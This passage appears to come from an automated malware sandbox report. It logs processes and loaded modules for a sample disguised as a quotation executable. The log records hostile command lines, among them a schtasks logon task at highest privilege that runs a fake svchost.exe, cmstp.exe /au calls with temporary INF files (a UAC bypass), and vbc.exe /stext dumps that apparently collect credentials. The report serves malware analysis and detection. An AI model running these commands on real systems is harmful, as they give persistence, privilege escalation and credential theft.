                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\Windows Mail\wab.exe"
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
                        Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
                        Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 444 -p 5864 -ip 5864
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 5864 -s 1120
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"
                        Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 460 -p 2772 -ip 2772
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 2772 -s 1072
                        Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe /stext "C:\Users\user\AppData\Local\Temp\lmxgukvurszvufgxilvllznhpy"
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\cmstp.exe "c:\windows\system32\cmstp.exe" /au C:\windows\temp\macatsxh.inf
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe /stext "C:\Users\user\AppData\Local\Temp\nglqvdfonaraelcbsvimoeayympwa"
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe /stext "C:\Users\user\AppData\Local\Temp\nglqvdfonaraelcbsvimoeayympwa"
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe /stext "C:\Users\user\AppData\Local\Temp\yiqjvvqpbijnhrqfbgcgyquhzthfbppay"
                        Source: unknownProcess created: C:\Users\user\AppData\Roaming\svchost.exe C:\Users\user\AppData\Roaming\svchost.exe
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: unknownProcess created: C:\Users\user\AppData\Roaming\svchost.exe "C:\Users\user\AppData\Roaming\svchost.exe"
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\cmstp.exe "c:\windows\system32\cmstp.exe" /au C:\windows\temp\54bmrp0l.inf
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe"
                        Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 536 -p 6908 -ip 6908
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 6908 -s 1076
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\cmstp.exe "c:\windows\system32\cmstp.exe" /au C:\windows\temp\xrlumlnf.inf
                        Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /IM cmstp.exe /F
                        Source: C:\Windows\System32\taskkill.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\Desktop\QUOTATION#30810.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' & exitJump to behavior
                        Source: C:\Users\user\Desktop\QUOTATION#30810.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpDAAA.tmp.bat""Jump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' Jump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout 3Jump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Roaming\svchost.exe "C:\Users\user\AppData\Roaming\svchost.exe" Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe"Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\iexplore.exe"Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\svchost.exe "C:\Windows\System32\svchost.exe"Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\Windows Mail\wab.exe"Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\cmstp.exe "c:\windows\system32\cmstp.exe" /au C:\windows\temp\macatsxh.infJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe /stext "C:\Users\user\AppData\Local\Temp\lmxgukvurszvufgxilvllznhpy"Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe /stext "C:\Users\user\AppData\Local\Temp\nglqvdfonaraelcbsvimoeayympwa"Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe /stext "C:\Users\user\AppData\Local\Temp\nglqvdfonaraelcbsvimoeayympwa"Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe /stext "C:\Users\user\AppData\Local\Temp\yiqjvvqpbijnhrqfbgcgyquhzthfbppay"Jump to behavior
                        Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 444 -p 5864 -ip 5864Jump to behavior
                        Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 5864 -s 1120Jump to behavior
                        Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 460 -p 2772 -ip 2772Jump to behavior
                        Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 2772 -s 1072Jump to behavior
                        Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 536 -p 6908 -ip 6908Jump to behavior
                        Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 6908 -s 1076Jump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\WerFault.exeProcess created: unknown unknown
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe"
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\cmstp.exe "c:\windows\system32\cmstp.exe" /au C:\windows\temp\54bmrp0l.inf
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\cmstp.exe "c:\windows\system32\cmstp.exe" /au C:\windows\temp\xrlumlnf.inf
                        Source: C:\Windows\System32\WerFault.exeProcess created: unknown unknown
                        Source: C:\Users\user\Desktop\QUOTATION#30810.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Users\user\Desktop\QUOTATION#30810.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\Desktop\QUOTATION#30810.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\Desktop\QUOTATION#30810.exeSection loaded: version.dllJump to behavior
                        Source: C:\Users\user\Desktop\QUOTATION#30810.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Users\user\Desktop\QUOTATION#30810.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\Desktop\QUOTATION#30810.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\Desktop\QUOTATION#30810.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Users\user\Desktop\QUOTATION#30810.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Users\user\Desktop\QUOTATION#30810.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Users\user\Desktop\QUOTATION#30810.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\Desktop\QUOTATION#30810.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\Desktop\QUOTATION#30810.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Users\user\Desktop\QUOTATION#30810.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\QUOTATION#30810.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Users\user\Desktop\QUOTATION#30810.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\Desktop\QUOTATION#30810.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Users\user\Desktop\QUOTATION#30810.exeSection loaded: edputil.dllJump to behavior
                        Source: C:\Users\user\Desktop\QUOTATION#30810.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Users\user\Desktop\QUOTATION#30810.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Users\user\Desktop\QUOTATION#30810.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Users\user\Desktop\QUOTATION#30810.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Users\user\Desktop\QUOTATION#30810.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                        Source: C:\Users\user\Desktop\QUOTATION#30810.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Users\user\Desktop\QUOTATION#30810.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Users\user\Desktop\QUOTATION#30810.exeSection loaded: appresolver.dllJump to behavior
                        Source: C:\Users\user\Desktop\QUOTATION#30810.exeSection loaded: bcp47langs.dllJump to behavior
                        Source: C:\Users\user\Desktop\QUOTATION#30810.exeSection loaded: slc.dllJump to behavior
                        Source: C:\Users\user\Desktop\QUOTATION#30810.exeSection loaded: sppc.dllJump to behavior
                        Source: C:\Users\user\Desktop\QUOTATION#30810.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                        Source: C:\Users\user\Desktop\QUOTATION#30810.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                        Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                        Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                        Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                        Source: C:\Windows\System32\timeout.exeSection loaded: version.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: version.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: version.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: version.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: winmm.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: wininet.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: rstrtmgr.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: ncrypt.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: ntasn1.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: winhttp.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: winnsi.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: rasadhlp.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: fwpuclnt.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: wersvc.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: windowsperformancerecordercontrol.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: weretw.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: wer.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: faultrep.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: dbghelp.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: dbgcore.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: wer.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
